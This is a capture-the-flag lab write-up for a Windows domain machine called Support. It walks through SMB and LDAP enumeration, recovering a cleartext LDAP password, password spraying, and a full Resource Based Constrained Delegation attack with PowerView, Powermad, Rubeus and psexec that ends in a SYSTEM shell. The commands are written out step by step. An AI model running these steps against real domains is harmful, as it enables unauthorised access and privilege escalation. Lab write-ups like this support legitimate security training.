About#
- Support is an Easy difficulty Windows machine that features an SMB share that allows anonymous authentication. After connecting to the share, an executable file is discovered that is used to query the machine's LDAP server for available users. Through reverse engineering, network analysis or emulation, the password that the binary uses to bind the LDAP server is identified and can be used to make further LDAP queries. A user called
supportis identified in the users list, and theinfofield is found to contain his password, thus allowing for a WinRM connection to the machine. Once on the machine, domain information can be gathered throughSharpHound, andBloodHoundreveals that theShared Support Accountsgroup that thesupportuser is a member of, hasGenericAllprivileges on the Domain Controller. A Resource Based Constrained Delegation attack is performed, and a shell asNT Authority\Systemis received.
Reconnaissance & Enumeration#
- The port scan reveals multiple open ports
- As always we got LDAP, Netbios, SMB etc ports open
- Using
smbclientI enumerated for smb shares and we got the share list
smbclient -L support.htb
- However the interesting share here is
support-tools. - Using netexec I confirmed the guest login and it was a success
netexec smb support.htb -u sundeity -p ""
- I enumerated for guest shares and we got access to two shares
netexec smb support.htb -u sundeity -p "" --shares
- So I checked the share
support-toolsand as the name suggests we got some tools inside the directory. Most of the tools are familiar to me aleast their names are familiar
- I decided to enumerate all the zips from the share. Initially the zips didn’t provide me with anything interesting so I moved on to enumerate LDAP.
nmap -n -sV --script "ldap* and not brute" -p 389 support.htb
- Then I enumerated for users using netexec from smb and got the users list
- Removed all unwanted texts from the list
cat users.txt | grep "SidTypeUser" | cut -d '\' -f 2 | cut -d '(' -f 1 >> users-smb.txt
- I Stored the users in a file.
UsersInfo.exe analysis#
- Remember the file
UsersInfo.exe.zipthat we have downloaded from SMB share. At first I didn’t notice it but after a while I was stuck and then I only I realized the unfamiliar tool among the known tools within the share - On running
UsersInfo.exewith wine I can see it, authenticate to ldap for retrieving the user that we requested by that this tool checks if that particular user available in the DC or not, then it returns the statement accordingly. - For an example the tool returned me a error
No such objectmeaning the requested user cannot be found within LDAP
- This tool doesn’t use any encryption to login against LDAP thus leaves the password used for authentication in clear text .If I can capture the traffic in wireshark I can get the password.
- In the LDAP I can see it authenticate as user
ldapwith the password. As I got a username and password I can now collect data for bloodhound - Getting data for Bloodhound
Exploitation#
- If we search the results of ldapsearch , particularly in the info field I can get another password. Which is new to me cause I never seen anything sensitive in an info field.
ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w '<password' -b "DC=support,DC=htb" | grep "info"
- In LDAP I got this password from the user
support@support.htb - I checked the bloodhound data, and user
supportis member of three groups
- For a change I used
crackmapexecto password spray, eventually it confirms the password forsupportuser
crackmapexec winrm support.htb -u users-smb.txt -p <password>
- Using the newly dicovered password I logged into winrm via
evilwinrmas usersupport
evil-winrm -u support -p '<password>' -i support.htb
- Got theUser flag
Privilege Escalation#
- If we see, user
supportis in a group calledShared Support Accounts@Support.htb. That group have Generic all permissions over Domain controller Itself.
- This privilege allows the trustee to manipulate the target object however they wish.
Abusing GenericALL#
- We can abuse this by the help instructions in Bloodhound for this Privilege. Here I am going to create a Fake computer under my control and that will act as DC to get kerberos ticket. Follow the steps below carefully
- Required Tools
- PowersView.ps1
- Powermad.ps1
- Rubeus.exe(Pre build from SharpCollection)
Step 1: Upload all the tools to the target system, then#
- Do the following in the winrm shell
cd C:\\programdata
upload PowersView.ps1
upload Powermad.ps1
upload Rubeus.exe
Step 2: Invoking all the scripts#
. .\PowerView.ps1
. .\Powermad.ps1
Step 3: Creating a Fake Computer#
New-MachineAccount -MachineAccount <Computername> -Password $(ConvertTo-SecureString '<Password>' -AsPlainText -Force)
- We need SID of the computer that we have created earlier, so that we can assign that value to a variable
$fakesid = Get-DomainComputer <Computername> | select -expand objectsid
Step 4: Configuring#
- Now I’ll configure the DC to trust my fake computer to make authorization decisions on it’s behalf. These commands will create an ACL with the fake computer’s SID and assign that to the DC
What is ACL?
An ACL is a list of access control entries (ACEs) that define permissions for users or groups to access specific objects (like users, groups, computers, or organizational units) and their attributes. Purpose: ACLs ensure that only authorized users can access specific resources and perform specific actions, enhancing security and data protection.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Step 5: Auth as the Computer#
.\Rubeus.exe hash /password:<Password> /user:<ComputerName> /domain:support.htb
- Now copy the
rc4_hmachash from the output
Step 6: Get the Kerberos Ticket#
.\Rubeus.exe s4u /user:<Computername>$ /rc4:<Hash> /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
- Now ticket will be captured. We can see the base64 encoded ticket
- Copy the ticket for Administrator and put in a file called
ticket.kirbi.b64 - Remove all the whitespaces and unwanted lines, I done this in vim using this command
:%s/\s\+//g - Now decode the base64 into a different file
base64 -d tick.kirbi.b64 > ticket.kirbi
- For linux operating systems we have to convert the ticket from
kirbitoccache, for passing the ticket - We can easily convert this using
ticketConverter.py. It’s one of the tool from Impacket tool kit.
sudo /home/n_emperor/.local/share/pipx/venvs/netexec/bin/ticketConverter.py ticket.kirbi ticket.ccache
- Now Pass the ticket and spawn a shell
KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass
End#
- Secured theRoot flag
